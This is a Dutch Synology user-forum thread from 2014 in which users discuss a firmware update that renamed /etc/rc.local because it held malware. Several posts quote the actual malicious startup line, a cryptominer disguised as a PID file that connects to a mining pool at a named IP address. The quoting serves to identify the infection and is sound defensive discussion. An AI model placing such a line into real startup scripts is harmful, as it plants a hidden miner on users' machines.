Auteur Topic: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware  (gelezen 8329 keer)

kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #15 Gepost op: 24 oktober 2014, 12:32:14 »
@JSSL
Dan zou ik wel eens willen zien wat er in rc.local.bak staat.

In een draadje ergens hierboven zegt JSSL

Dit stond er in de rc.local: /var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

/var/run/httpd-log.pid is een verwijzing naar Miner software.

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 958
  • -Ontvangen: 5240
  • Berichten: 31.285
  • Synology is awesome.
    • Synology Support
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #16 Gepost op: 24 oktober 2014, 12:38:58 »
Overheen gekeken dus...  :oops:
DAT is inderdaad een zeer goede reden voor DSM om die te renamen.  8)
Veel mensen weten veel, maar niemand weet alles.


CS406     2 x HDS721075KLA330 DSM 2.0-0731       [ARCHIEF OPSLAG]
          ST3750640AS HD753LJ
DS107+    HDS722020ALA330     DSM 3.1-1639       [ARCHIEF OPSLAG]
DS111     WD40EZRZ            DSM 6.1.7-15284-3  [ARCHIEF OPSLAG]
DS411slim Wisselende HD's     DSM 6.2.1-23824-1  [SPEELTJE]
DS411+II  4 x HDS724040ALE640 DSM 6.1.7-15284-3  [PROD]
DS413j    4 x WD20EARX        DSM 6.1.7-15284-3  [BACKUP]
DS716+II  2 x DT01ACA050      DSM 6.2.2-24922-2  [TEST]
RT2600ac                      SRM 1.2.2-7915     [PROD]
MR2200ac                      SRM 1.2.2-7915     [PROD]

Ben(V)

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #17 Gepost op: 24 oktober 2014, 12:43:37 »
Ben nu wel nieuwsgierig wat hij zou doen als er zowel een bitcone miner als een optware startup in rc.local zou staan.

Overigens blijf ik erbij dat derde partijen niets te zoeken hebben in rc.local
Als je daar iets kunt opstarten zit je heel vroeg in het bootproces en heb je veel te veel mogelijkheden om nare dingen uit te halen.

Is tegenwoordig helemaal niet meer nodig sinds Synology actief het gebruik van externe package ondersteund.

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 106
  • -Ontvangen: 1622
  • Berichten: 10.746
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #18 Gepost op: 24 oktober 2014, 12:57:15 »
ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is.

Misschien niet ongebruikelijk, maar bij TS staat er:
Citaat
/var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

En vooral de link naar: 93.174.95.67 is verdacht. En als ik dat IP bekijk, dan behoort hij tot :"Ecatel Ltd, P.o.box 19533, 2500 Cm Den Haag, Netherlands"

Ik weet niet wat dat voor firma is, maar van de laatste 5 SSH aanvallen op mijn NAS kwamen er 3 vanaf een IP adres dat tot Ecatel behoort. (Ik heb al 3 IP reeksen van die firma geblokkeerd).
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR

kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #19 Gepost op: 24 oktober 2014, 13:02:02 »
Ben nu wel nieuwsgierig wat hij zou doen als er zowel een bitcone miner als een optware startup in rc.local zou staan.

Overigens blijf ik erbij dat derde partijen niets te zoeken hebben in rc.local
Als je daar iets kunt opstarten zit je heel vroeg in het bootproces en heb je veel te veel mogelijkheden om nare dingen uit te halen.

Is tegenwoordig helemaal niet meer nodig sinds Synology actief het gebruik van externe package ondersteund.


Als een check wordt gedaan op de aanwezigheid van de string httpd-log.pid in het bestand, wordt de rc.local aan de kant gezet, ongeacht wat er verder nog in staat, want zo belangrijk is dat bestand verder niet.

Ik vind je overweging m.b.t. wel of niet rc.local op een Syno eerlijk gezegd verder niet zo spannend.
Ik maak me er meer zorgen over dat een externe partij in staat is om root te krijgen op een Syno systeem, want dan kan je overal en altijd grapjes uithalen, niet alleen in de /etc/rc.local.



kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #20 Gepost op: 24 oktober 2014, 13:03:51 »

ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is.

Niet ongebruikelijk, maar bij TS staat er:
Citaat
/var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

ja Briolet, dat had ik gezien.  :idea:

Offline JSSL

  • Bedankjes
  • -Gegeven: 7
  • -Ontvangen: 8
  • Berichten: 165
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #21 Gepost op: 24 oktober 2014, 13:11:36 »
@Birdy, zie de 3e post van dit topic. ;)
  • Mijn Synology: 2x DS212J
  • HDD's: 4x WD10EFRX


 

Na de laatste update geen foto's meer via de tv, en geen muziek meer

Gestart door jwvanwijngaardenBoard Synology DSM 5.1 en eerder

Reacties: 0
Gelezen: 3218
Laatste bericht 08 september 2013, 13:50:43
door jwvanwijngaarden
kan firmware niet updaten "Fail to update the file The file is probably corrupt"

Gestart door chrisspaansenBoard Synology DSM algemeen

Reacties: 1
Gelezen: 4290
Laatste bericht 10 november 2014, 22:07:31
door cyrus1977
"Update Failed: status = 59"

Gestart door JanGooBoard Antivirus Essential

Reacties: 3
Gelezen: 4954
Laatste bericht 16 juni 2016, 15:15:54
door Hofstede
Failed to update "phpMyAdmin"

Gestart door petervandermeijBoard PHPMyAdmin Package

Reacties: 4
Gelezen: 1716
Laatste bericht 04 juli 2017, 15:43:20
door petervandermeij
Backup "hangt" na update 4.3-3776-2

Gestart door plenjouBoard Synology DSM 5.1 en eerder

Reacties: 2
Gelezen: 1110
Laatste bericht 17 oktober 2013, 08:17:36
door plenjou
Synology-Forum.nl is een Nederlands gebruikersforum en staat volledig los van het merk Synology. Lees onze privacyverklaring.